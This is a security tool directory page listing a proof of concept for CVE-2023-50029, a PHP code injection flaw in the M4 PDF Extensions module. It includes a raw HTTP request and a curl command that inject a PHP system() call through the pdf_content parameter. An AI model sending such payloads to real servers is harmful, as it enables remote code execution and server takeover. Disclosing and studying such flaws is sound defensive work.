Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
PHP-Injection-in-M4-PDF-Extensions — CVE-2023-50029: PHP Injection Vulnerability in M4 PDF Extensions Module | Kitploit
Tools/GitHubGitHub/absholi7ly/php-injection-in-m4-pdf-extensions
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubabsholi7ly/php-injection-in-m4-pdf-extensions

PHP-Injection-in-M4-PDF-Extensions

CVE-2023-50029: PHP Injection Vulnerability in M4 PDF Extensions Module

View Repository

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
12 years agoNot yet reviewed

PHP-Injection-in-M4-PDF-Extensions

CVE-2023-50029 is a PHP injection vulnerability in the M4 PDF Extensions module. This vulnerability allows attackers to inject and execute arbitrary PHP code on the server, enabling them to gain full control over the targeted system. The issue lies in the improper validation of inputs, allowing malicious code to be passed through user parameters.

Poc

root@kitploit:~
POST /generate_pdf.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 59

pdf_content=<?php system('uname -a'); ?>

OR Curl

root@kitploit:~
curl -X POST http://example.com/generate_pdf.php -d "pdf_content=<?php system('uname -a'); ?>"
Download Tool